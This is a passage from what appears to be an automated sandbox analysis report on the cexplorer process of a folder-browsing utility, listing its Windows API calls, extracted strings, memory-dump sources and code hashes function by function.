                                                                                                            • API String ID: 3990497365-2889622443
                                                                                                            • Opcode ID: 3c737965b4ec9576d0ee8a4755905ea0b16ee3f21f51c2d6b16f0e89e0c39ff7
                                                                                                            • Instruction ID: 3292a607312dafa673f80e908299677ccf1e24f3227c0f0c96b800f003ea4aa5
                                                                                                            • Opcode Fuzzy Hash: 3c737965b4ec9576d0ee8a4755905ea0b16ee3f21f51c2d6b16f0e89e0c39ff7
                                                                                                            • Instruction Fuzzy Hash: 9F412A74A003599FDB20EF69DC80AC9B7F9BB89310F4040E6E908E7261DB75AE948F50
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation,03708820), ref: 03555E72
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 03555E78
                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation,03708820), ref: 03555E94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                            • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                                                            • API String ID: 4275029093-812649623
                                                                                                            • Opcode ID: a77de60801ab65f20dec30397acb26f00790d0608fd11a7f5f16a38b753e44e0
                                                                                                            • Instruction ID: b890d6a5fbffca06b727d728ee340ec0e4076700c7dbc85c4869cf307e464137
                                                                                                            • Opcode Fuzzy Hash: a77de60801ab65f20dec30397acb26f00790d0608fd11a7f5f16a38b753e44e0
                                                                                                            • Instruction Fuzzy Hash: BA1196B5904304AEDB10EBA4F8A1B5DB7B8FF41210F1848A7FC06DA171F735B680C615
                                                                                                            APIs
                                                                                                              • Part of subcall function 035E7E98: SHGetPathFromIDListW.SHELL32(?,?), ref: 035E7EEC
                                                                                                            • GlobalAddAtomW.KERNEL32(00000000), ref: 035E9399
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 035E93BE
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            • GlobalDeleteAtom.KERNEL32(?), ref: 035E93D6
                                                                                                            Strings
                                                                                                            • error, xrefs: 035E9384
                                                                                                            • ERROR OnNavigationComplete: PostMessage fail, xrefs: 035E93C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$DeleteMessagePost$FromListPath
                                                                                                            • String ID: ERROR OnNavigationComplete: PostMessage fail$error
                                                                                                            • API String ID: 3733832026-3584304341
                                                                                                            • Opcode ID: 6539d4ad2e7fd2d129163ee15cee22e4dee5ddccce3db22b8d4e42760959e084
                                                                                                            • Instruction ID: 66d64d56a2970f887e01917e8258ec5fa3aa3b76cdc8cbf863f05e1725a00471
                                                                                                            • Opcode Fuzzy Hash: 6539d4ad2e7fd2d129163ee15cee22e4dee5ddccce3db22b8d4e42760959e084
                                                                                                            • Instruction Fuzzy Hash: 9C11FA79604309AFDB45EBA8E89099DB7F8FF8D210B4144A2F814DB670E734AA41CB24
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CursorForegroundFromParentPoint
                                                                                                            • String ID: 3
                                                                                                            • API String ID: 109862150-1842515611
                                                                                                            • Opcode ID: fd582e6bc56b5b9cfc936fd9d26e6ecb18590f5be6c72eedee1f5cfb5f30c062
                                                                                                            • Instruction ID: 160796d938db574542441521f7b4bd92d989decda428fc65e7878cd5f1a91e7f
                                                                                                            • Opcode Fuzzy Hash: fd582e6bc56b5b9cfc936fd9d26e6ecb18590f5be6c72eedee1f5cfb5f30c062
                                                                                                            • Instruction Fuzzy Hash: 0011D279D0024ADFCB05DFA8D480AAEBBB5BF49301F1984A6D824AB260D3349A01CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eb00132243ad18606eadb56add95c490add5f3a77fc3275524f45831cfc31c99
                                                                                                            • Instruction ID: 669551502c541266fbdb9b16807275a97b134fbb74dc4326a8305f4b42d57208
                                                                                                            • Opcode Fuzzy Hash: eb00132243ad18606eadb56add95c490add5f3a77fc3275524f45831cfc31c99
                                                                                                            • Instruction Fuzzy Hash: 2FD18239A00659DFCF10EF94F4808FEBBB9FF49610F8444A5E840BB265D634AE49DB61
                                                                                                            APIs
                                                                                                            • FindWindowExW.USER32(?,00000000,TFolderTreeView,00000000), ref: 035E8B2B
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            • TFolderTreeView, xrefs: 035E8B20
                                                                                                            • ERROR SetBrowsePathInno: FindWindowEx failed, xrefs: 035E8B39
                                                                                                            • ERROR SetBrowsePathInno: Item not found , xrefs: 035E8C32
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$DeleteFindMessagePostWindow
                                                                                                            • String ID: ERROR SetBrowsePathInno: FindWindowEx failed$ERROR SetBrowsePathInno: Item not found $TFolderTreeView
                                                                                                            • API String ID: 1899056751-2700439369
                                                                                                            • Opcode ID: 2db3f162cd9ebf48537bb01a093c807243a96eef6b30f5e86085931491f2ac06
                                                                                                            • Instruction ID: 221ac0a9ca252de19827cf2cd77e5155285f68064dc7487b4e4667bc741bafa6
                                                                                                            • Opcode Fuzzy Hash: 2db3f162cd9ebf48537bb01a093c807243a96eef6b30f5e86085931491f2ac06
                                                                                                            • Instruction Fuzzy Hash: 82414074D0031E9FCF18EFA8E8546AEB7F9BB49B10F5444A5E415BB2A0D7346940CB64
                                                                                                            APIs
                                                                                                              • Part of subcall function 035E81D4: SendMessageW.USER32(?,00000407,00000000,00000000), ref: 035E821C
                                                                                                            • GetTickCount.KERNEL32 ref: 035E954D
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            • ERROR SetDialogYps: Advise fail: , xrefs: 035E958F
                                                                                                            • ERROR SetDialogYps: IExplorerBrowser not found, xrefs: 035E9515
                                                                                                            • <nopathentered>, xrefs: 035E94CC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobalMessage$CountDeletePostSendTick
                                                                                                            • String ID: <nopathentered>$ERROR SetDialogYps: Advise fail: $ERROR SetDialogYps: IExplorerBrowser not found
                                                                                                            • API String ID: 387905791-4011323065
                                                                                                            • Opcode ID: 2d6a9fd6e8474723b28aac858328e4648e74f9b51e784b4d70b212a4eefcafd6
                                                                                                            • Instruction ID: d5d89a33eda0790d9d1d804ef91482bcf1baa0aec50cda37842fc23b50150245
                                                                                                            • Opcode Fuzzy Hash: 2d6a9fd6e8474723b28aac858328e4648e74f9b51e784b4d70b212a4eefcafd6
                                                                                                            • Instruction Fuzzy Hash: 13412D74E042499FDB09DFA8E9509DEBBF4FB88310F1085A6E814E7760D734AA01CFA4
                                                                                                            APIs
                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,035692E3), ref: 03569286
                                                                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,035692E3), ref: 0356928C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                            • String ID: $yyyy
                                                                                                            • API String ID: 3303714858-404527807
                                                                                                            • Opcode ID: 8447542f90029efb1463419d3e45756a7b2e10ee74d3a85365feedebf0e622cd
                                                                                                            • Instruction ID: 6a973ea73bfb3287f764a1bc875c802a154383d0077dc76a7f4c413b1544d4af
                                                                                                            • Opcode Fuzzy Hash: 8447542f90029efb1463419d3e45756a7b2e10ee74d3a85365feedebf0e622cd
                                                                                                            • Instruction Fuzzy Hash: 3D216035A047199BDB50EF94E8909AEB3F8FF48710F4144A6FC45EB264E730AE40C7A5
                                                                                                            APIs
                                                                                                            • GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                            • PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                            • GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$DeleteMessagePost
                                                                                                            • String ID: ...
                                                                                                            • API String ID: 937182704-440645147
                                                                                                            • Opcode ID: c4a29169dcf2e211a59eb967db01b7d4ff7878de313b631b038e5d228139cabb
                                                                                                            • Instruction ID: fc48357d42c848533142d968571e8d90de6eb011ff5d1a24df5acb757a7349b9
                                                                                                            • Opcode Fuzzy Hash: c4a29169dcf2e211a59eb967db01b7d4ff7878de313b631b038e5d228139cabb
                                                                                                            • Instruction Fuzzy Hash: 53113078A04349EFDB04EBA8E955A9DB3F8FB49300F5040A2F810EB670D734AE00DB15
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 035E7486
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 035E749D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow
                                                                                                            • String ID: CabinetWClass$ExploreWClass
                                                                                                            • API String ID: 1378638983-1982176359
                                                                                                            • Opcode ID: 05cfcf3eada7e2669a2b3c44329737e18c20c45f7d8d48bc0da45499839481eb
                                                                                                            • Instruction ID: fafbb7142004bf1b7f224bb4d0b1e27932cc168c69cd89f1e4f553e91086663b
                                                                                                            • Opcode Fuzzy Hash: 05cfcf3eada7e2669a2b3c44329737e18c20c45f7d8d48bc0da45499839481eb
                                                                                                            • Instruction Fuzzy Hash: AF11C435A00349DFDF19EBA8EC105AEFBB4FB4C710F5449A6E861A72B0D3706A40CB64
                                                                                                            APIs
                                                                                                            • RegisterWindowMessageW.USER32(WM_WINDOW_FOUND by Chameleon Folder), ref: 035E9A1A
                                                                                                            • RegisterWindowMessageW.USER32(WM_WINDOW_FOUND by Chameleon Folder 2,WM_WINDOW_FOUND by Chameleon Folder), ref: 035E9A2F
                                                                                                              • Part of subcall function 035E99A0: CreateThread.KERNEL32(00000000,00000000,035E9904,00000000,00000004,035F9420), ref: 035E99B2
                                                                                                              • Part of subcall function 035E99A0: SetThreadPriority.KERNEL32(?,00000002,035E9A44,WM_WINDOW_FOUND by Chameleon Folder 2,WM_WINDOW_FOUND by Chameleon Folder), ref: 035E99C4
                                                                                                              • Part of subcall function 035E99A0: ResumeThread.KERNEL32(?,?,00000002,035E9A44,WM_WINDOW_FOUND by Chameleon Folder 2,WM_WINDOW_FOUND by Chameleon Folder), ref: 035E99CF
                                                                                                            Strings
                                                                                                            • WM_WINDOW_FOUND by Chameleon Folder, xrefs: 035E9A15
                                                                                                            • WM_WINDOW_FOUND by Chameleon Folder 2, xrefs: 035E9A2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$MessageRegisterWindow$CreatePriorityResume
                                                                                                            • String ID: WM_WINDOW_FOUND by Chameleon Folder$WM_WINDOW_FOUND by Chameleon Folder 2
                                                                                                            • API String ID: 3626708800-2270766243
                                                                                                            • Opcode ID: b840280cf40e16d1d14935a295d29bf4ef7617c9b0edfaabd3a69e2a241497bb
                                                                                                            • Instruction ID: 96fcf26456aba956c4c925cb0947aed767baab31ddd0926267ed552134ad551d
                                                                                                            • Opcode Fuzzy Hash: b840280cf40e16d1d14935a295d29bf4ef7617c9b0edfaabd3a69e2a241497bb
                                                                                                            • Instruction Fuzzy Hash: 7001A4B86006459FE706EF14E080E69BBE1FB99300F54819AD8048B339C374E986EB91
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 03559CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 03559D47
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 03559DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 03559DD7
                                                                                                              • Part of subcall function 03559C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,03559D55), ref: 03559CAB
                                                                                                              • Part of subcall function 03559C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,03559D55), ref: 03559CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: a45157c6cdef4d7b8416f201d0873f66d2e975ddb768e80d8208e542d3ed41d6
                                                                                                            • Instruction ID: f4ca31724ba336d0f8451d3810aaa3f7b380d29e875ea90761f5837a3164c1f8
                                                                                                            • Opcode Fuzzy Hash: a45157c6cdef4d7b8416f201d0873f66d2e975ddb768e80d8208e542d3ed41d6
                                                                                                            • Instruction Fuzzy Hash: 45316674A0021ADFDB10EFE5E894AEEB3B8FF44310F444566E911DB2A4D778AA05CB50
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 035E88F1
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 035E891E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: D
                                                                                                            • API String ID: 3850602802-2746444292
                                                                                                            • Opcode ID: 3f93b7c55d27016566684b4e250176af56d5ffc133f778d6810897a5b0df955e
                                                                                                            • Instruction ID: 91529574ed55b55dd46e0d23cad1e4662210765ff6e8c295a9e69a1cd5663342
                                                                                                            • Opcode Fuzzy Hash: 3f93b7c55d27016566684b4e250176af56d5ffc133f778d6810897a5b0df955e
                                                                                                            • Instruction Fuzzy Hash: 06111875E05249EFDB11CFE8C989BEEBBF4AB08700F144495E954EB391D3746A40CBA1
                                                                                                            APIs
                                                                                                            • GetWindowTextW.USER32(?,?,0000002A), ref: 035E7730
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
